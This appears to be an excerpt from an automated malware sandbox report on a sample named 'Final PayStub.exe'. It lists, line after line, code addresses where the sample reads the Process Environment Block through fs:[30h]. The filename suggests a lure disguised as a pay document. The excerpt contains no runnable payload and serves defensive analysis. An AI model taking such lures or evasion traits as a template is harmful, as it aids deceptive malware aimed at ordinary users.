Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B8402 mov eax, dword ptr fs:[00000030h]	6_2_013B8402
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B8402 mov eax, dword ptr fs:[00000030h]	6_2_013B8402
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B8402 mov eax, dword ptr fs:[00000030h]	6_2_013B8402
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AA470 mov eax, dword ptr fs:[00000030h]	6_2_013AA470
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AA470 mov eax, dword ptr fs:[00000030h]	6_2_013AA470
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AA470 mov eax, dword ptr fs:[00000030h]	6_2_013AA470
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A245A mov eax, dword ptr fs:[00000030h]	6_2_013A245A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406420 mov eax, dword ptr fs:[00000030h]	6_2_01406420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406420 mov eax, dword ptr fs:[00000030h]	6_2_01406420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406420 mov eax, dword ptr fs:[00000030h]	6_2_01406420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406420 mov eax, dword ptr fs:[00000030h]	6_2_01406420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406420 mov eax, dword ptr fs:[00000030h]	6_2_01406420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406420 mov eax, dword ptr fs:[00000030h]	6_2_01406420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01406420 mov eax, dword ptr fs:[00000030h]	6_2_01406420
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137645D mov eax, dword ptr fs:[00000030h]	6_2_0137645D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BE443 mov eax, dword ptr fs:[00000030h]	6_2_013BE443
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B44B0 mov ecx, dword ptr fs:[00000030h]	6_2_013B44B0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013864AB mov eax, dword ptr fs:[00000030h]	6_2_013864AB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0143A49A mov eax, dword ptr fs:[00000030h]	6_2_0143A49A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013804E5 mov ecx, dword ptr fs:[00000030h]	6_2_013804E5
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140A4B0 mov eax, dword ptr fs:[00000030h]	6_2_0140A4B0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B273C mov eax, dword ptr fs:[00000030h]	6_2_013B273C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B273C mov ecx, dword ptr fs:[00000030h]	6_2_013B273C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B273C mov eax, dword ptr fs:[00000030h]	6_2_013B273C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FC730 mov eax, dword ptr fs:[00000030h]	6_2_013FC730
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01404755 mov eax, dword ptr fs:[00000030h]	6_2_01404755
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC720 mov eax, dword ptr fs:[00000030h]	6_2_013BC720
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC720 mov eax, dword ptr fs:[00000030h]	6_2_013BC720
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140E75D mov eax, dword ptr fs:[00000030h]	6_2_0140E75D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380710 mov eax, dword ptr fs:[00000030h]	6_2_01380710
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B0710 mov eax, dword ptr fs:[00000030h]	6_2_013B0710
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC700 mov eax, dword ptr fs:[00000030h]	6_2_013BC700
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388770 mov eax, dword ptr fs:[00000030h]	6_2_01388770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390770 mov eax, dword ptr fs:[00000030h]	6_2_01390770
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380750 mov eax, dword ptr fs:[00000030h]	6_2_01380750
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2750 mov eax, dword ptr fs:[00000030h]	6_2_013C2750
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2750 mov eax, dword ptr fs:[00000030h]	6_2_013C2750
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B674D mov esi, dword ptr fs:[00000030h]	6_2_013B674D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B674D mov eax, dword ptr fs:[00000030h]	6_2_013B674D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B674D mov eax, dword ptr fs:[00000030h]	6_2_013B674D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014007C3 mov eax, dword ptr fs:[00000030h]	6_2_014007C3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013807AF mov eax, dword ptr fs:[00000030h]	6_2_013807AF
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140E7E1 mov eax, dword ptr fs:[00000030h]	6_2_0140E7E1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013847FB mov eax, dword ptr fs:[00000030h]	6_2_013847FB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013847FB mov eax, dword ptr fs:[00000030h]	6_2_013847FB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142678E mov eax, dword ptr fs:[00000030h]	6_2_0142678E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A27ED mov eax, dword ptr fs:[00000030h]	6_2_013A27ED
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A27ED mov eax, dword ptr fs:[00000030h]	6_2_013A27ED
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A27ED mov eax, dword ptr fs:[00000030h]	6_2_013A27ED
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014347A0 mov eax, dword ptr fs:[00000030h]	6_2_014347A0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138C7C0 mov eax, dword ptr fs:[00000030h]	6_2_0138C7C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138262C mov eax, dword ptr fs:[00000030h]	6_2_0138262C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B6620 mov eax, dword ptr fs:[00000030h]	6_2_013B6620
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B8620 mov eax, dword ptr fs:[00000030h]	6_2_013B8620
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139E627 mov eax, dword ptr fs:[00000030h]	6_2_0139E627
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C2619 mov eax, dword ptr fs:[00000030h]	6_2_013C2619
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144866E mov eax, dword ptr fs:[00000030h]	6_2_0144866E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144866E mov eax, dword ptr fs:[00000030h]	6_2_0144866E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139260B mov eax, dword ptr fs:[00000030h]	6_2_0139260B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139260B mov eax, dword ptr fs:[00000030h]	6_2_0139260B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139260B mov eax, dword ptr fs:[00000030h]	6_2_0139260B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139260B mov eax, dword ptr fs:[00000030h]	6_2_0139260B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139260B mov eax, dword ptr fs:[00000030h]	6_2_0139260B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139260B mov eax, dword ptr fs:[00000030h]	6_2_0139260B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139260B mov eax, dword ptr fs:[00000030h]	6_2_0139260B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE609 mov eax, dword ptr fs:[00000030h]	6_2_013FE609
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B2674 mov eax, dword ptr fs:[00000030h]	6_2_013B2674
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA660 mov eax, dword ptr fs:[00000030h]	6_2_013BA660
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA660 mov eax, dword ptr fs:[00000030h]	6_2_013BA660
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0139C640 mov eax, dword ptr fs:[00000030h]	6_2_0139C640
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B66B0 mov eax, dword ptr fs:[00000030h]	6_2_013B66B0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC6A6 mov eax, dword ptr fs:[00000030h]	6_2_013BC6A6
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01384690 mov eax, dword ptr fs:[00000030h]	6_2_01384690
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01384690 mov eax, dword ptr fs:[00000030h]	6_2_01384690
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014006F1 mov eax, dword ptr fs:[00000030h]	6_2_014006F1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014006F1 mov eax, dword ptr fs:[00000030h]	6_2_014006F1
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE6F2 mov eax, dword ptr fs:[00000030h]	6_2_013FE6F2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE6F2 mov eax, dword ptr fs:[00000030h]	6_2_013FE6F2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE6F2 mov eax, dword ptr fs:[00000030h]	6_2_013FE6F2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE6F2 mov eax, dword ptr fs:[00000030h]	6_2_013FE6F2
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA6C7 mov ebx, dword ptr fs:[00000030h]	6_2_013BA6C7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA6C7 mov eax, dword ptr fs:[00000030h]	6_2_013BA6C7
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01400946 mov eax, dword ptr fs:[00000030h]	6_2_01400946
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01378918 mov eax, dword ptr fs:[00000030h]	6_2_01378918
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01378918 mov eax, dword ptr fs:[00000030h]	6_2_01378918
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE908 mov eax, dword ptr fs:[00000030h]	6_2_013FE908
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FE908 mov eax, dword ptr fs:[00000030h]	6_2_013FE908
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01424978 mov eax, dword ptr fs:[00000030h]	6_2_01424978
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01424978 mov eax, dword ptr fs:[00000030h]	6_2_01424978
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140C97C mov eax, dword ptr fs:[00000030h]	6_2_0140C97C
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C096E mov eax, dword ptr fs:[00000030h]	6_2_013C096E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C096E mov edx, dword ptr fs:[00000030h]	6_2_013C096E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013C096E mov eax, dword ptr fs:[00000030h]	6_2_013C096E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140C912 mov eax, dword ptr fs:[00000030h]	6_2_0140C912
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A6962 mov eax, dword ptr fs:[00000030h]	6_2_013A6962
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A6962 mov eax, dword ptr fs:[00000030h]	6_2_013A6962
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A6962 mov eax, dword ptr fs:[00000030h]	6_2_013A6962
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140892A mov eax, dword ptr fs:[00000030h]	6_2_0140892A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0141892B mov eax, dword ptr fs:[00000030h]	6_2_0141892B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014169C0 mov eax, dword ptr fs:[00000030h]	6_2_014169C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013809AD mov eax, dword ptr fs:[00000030h]	6_2_013809AD
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013809AD mov eax, dword ptr fs:[00000030h]	6_2_013809AD
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144A9D3 mov eax, dword ptr fs:[00000030h]	6_2_0144A9D3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140E9E0 mov eax, dword ptr fs:[00000030h]	6_2_0140E9E0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B29F9 mov eax, dword ptr fs:[00000030h]	6_2_013B29F9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B29F9 mov eax, dword ptr fs:[00000030h]	6_2_013B29F9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0138A9D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0138A9D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0138A9D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0138A9D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0138A9D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0138A9D0 mov eax, dword ptr fs:[00000030h]	6_2_0138A9D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B49D0 mov eax, dword ptr fs:[00000030h]	6_2_013B49D0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014089B3 mov esi, dword ptr fs:[00000030h]	6_2_014089B3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014089B3 mov eax, dword ptr fs:[00000030h]	6_2_014089B3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014089B3 mov eax, dword ptr fs:[00000030h]	6_2_014089B3
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BA830 mov eax, dword ptr fs:[00000030h]	6_2_013BA830
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A2835 mov eax, dword ptr fs:[00000030h]	6_2_013A2835
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A2835 mov eax, dword ptr fs:[00000030h]	6_2_013A2835
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A2835 mov eax, dword ptr fs:[00000030h]	6_2_013A2835
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A2835 mov ecx, dword ptr fs:[00000030h]	6_2_013A2835
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A2835 mov eax, dword ptr fs:[00000030h]	6_2_013A2835
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A2835 mov eax, dword ptr fs:[00000030h]	6_2_013A2835
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01416870 mov eax, dword ptr fs:[00000030h]	6_2_01416870
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01416870 mov eax, dword ptr fs:[00000030h]	6_2_01416870
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140E872 mov eax, dword ptr fs:[00000030h]	6_2_0140E872
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140E872 mov eax, dword ptr fs:[00000030h]	6_2_0140E872
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140C810 mov eax, dword ptr fs:[00000030h]	6_2_0140C810
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01384859 mov eax, dword ptr fs:[00000030h]	6_2_01384859
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01384859 mov eax, dword ptr fs:[00000030h]	6_2_01384859
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013B0854 mov eax, dword ptr fs:[00000030h]	6_2_013B0854
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142483A mov eax, dword ptr fs:[00000030h]	6_2_0142483A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142483A mov eax, dword ptr fs:[00000030h]	6_2_0142483A
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_014508C0 mov eax, dword ptr fs:[00000030h]	6_2_014508C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144A8E4 mov eax, dword ptr fs:[00000030h]	6_2_0144A8E4
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380887 mov eax, dword ptr fs:[00000030h]	6_2_01380887
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC8F9 mov eax, dword ptr fs:[00000030h]	6_2_013BC8F9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BC8F9 mov eax, dword ptr fs:[00000030h]	6_2_013BC8F9
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140C89D mov eax, dword ptr fs:[00000030h]	6_2_0140C89D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AE8C0 mov eax, dword ptr fs:[00000030h]	6_2_013AE8C0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01428B42 mov eax, dword ptr fs:[00000030h]	6_2_01428B42
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01416B40 mov eax, dword ptr fs:[00000030h]	6_2_01416B40
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01416B40 mov eax, dword ptr fs:[00000030h]	6_2_01416B40
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0144AB40 mov eax, dword ptr fs:[00000030h]	6_2_0144AB40
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01434B4B mov eax, dword ptr fs:[00000030h]	6_2_01434B4B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01434B4B mov eax, dword ptr fs:[00000030h]	6_2_01434B4B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142EB50 mov eax, dword ptr fs:[00000030h]	6_2_0142EB50
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AEB20 mov eax, dword ptr fs:[00000030h]	6_2_013AEB20
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AEB20 mov eax, dword ptr fs:[00000030h]	6_2_013AEB20
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FEB1D mov eax, dword ptr fs:[00000030h]	6_2_013FEB1D
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0137CB7E mov eax, dword ptr fs:[00000030h]	6_2_0137CB7E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01448B28 mov eax, dword ptr fs:[00000030h]	6_2_01448B28
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01448B28 mov eax, dword ptr fs:[00000030h]	6_2_01448B28
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390BBE mov eax, dword ptr fs:[00000030h]	6_2_01390BBE
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390BBE mov eax, dword ptr fs:[00000030h]	6_2_01390BBE
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142EBD0 mov eax, dword ptr fs:[00000030h]	6_2_0142EBD0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140CBF0 mov eax, dword ptr fs:[00000030h]	6_2_0140CBF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AEBFC mov eax, dword ptr fs:[00000030h]	6_2_013AEBFC
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388BF0 mov eax, dword ptr fs:[00000030h]	6_2_01388BF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388BF0 mov eax, dword ptr fs:[00000030h]	6_2_01388BF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01388BF0 mov eax, dword ptr fs:[00000030h]	6_2_01388BF0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A0BCB mov eax, dword ptr fs:[00000030h]	6_2_013A0BCB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A0BCB mov eax, dword ptr fs:[00000030h]	6_2_013A0BCB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A0BCB mov eax, dword ptr fs:[00000030h]	6_2_013A0BCB
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01434BB0 mov eax, dword ptr fs:[00000030h]	6_2_01434BB0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01434BB0 mov eax, dword ptr fs:[00000030h]	6_2_01434BB0
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380BCD mov eax, dword ptr fs:[00000030h]	6_2_01380BCD
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380BCD mov eax, dword ptr fs:[00000030h]	6_2_01380BCD
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01380BCD mov eax, dword ptr fs:[00000030h]	6_2_01380BCD
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BCA38 mov eax, dword ptr fs:[00000030h]	6_2_013BCA38
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A4A35 mov eax, dword ptr fs:[00000030h]	6_2_013A4A35
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013A4A35 mov eax, dword ptr fs:[00000030h]	6_2_013A4A35
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013AEA2E mov eax, dword ptr fs:[00000030h]	6_2_013AEA2E
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BCA24 mov eax, dword ptr fs:[00000030h]	6_2_013BCA24
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0142EA60 mov eax, dword ptr fs:[00000030h]	6_2_0142EA60
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FCA72 mov eax, dword ptr fs:[00000030h]	6_2_013FCA72
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013FCA72 mov eax, dword ptr fs:[00000030h]	6_2_013FCA72
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_0140CA11 mov eax, dword ptr fs:[00000030h]	6_2_0140CA11
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BCA6F mov eax, dword ptr fs:[00000030h]	6_2_013BCA6F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BCA6F mov eax, dword ptr fs:[00000030h]	6_2_013BCA6F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_013BCA6F mov eax, dword ptr fs:[00000030h]	6_2_013BCA6F
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390A5B mov eax, dword ptr fs:[00000030h]	6_2_01390A5B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01390A5B mov eax, dword ptr fs:[00000030h]	6_2_01390A5B
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386A50 mov eax, dword ptr fs:[00000030h]	6_2_01386A50
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386A50 mov eax, dword ptr fs:[00000030h]	6_2_01386A50
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386A50 mov eax, dword ptr fs:[00000030h]	6_2_01386A50
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386A50 mov eax, dword ptr fs:[00000030h]	6_2_01386A50
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386A50 mov eax, dword ptr fs:[00000030h]	6_2_01386A50
Source: C:\Users\user\Desktop\Final PayStub.exe	Code function: 6_2_01386A50 mov eax, dword ptr fs:[00000030h]	6_2_01386A50
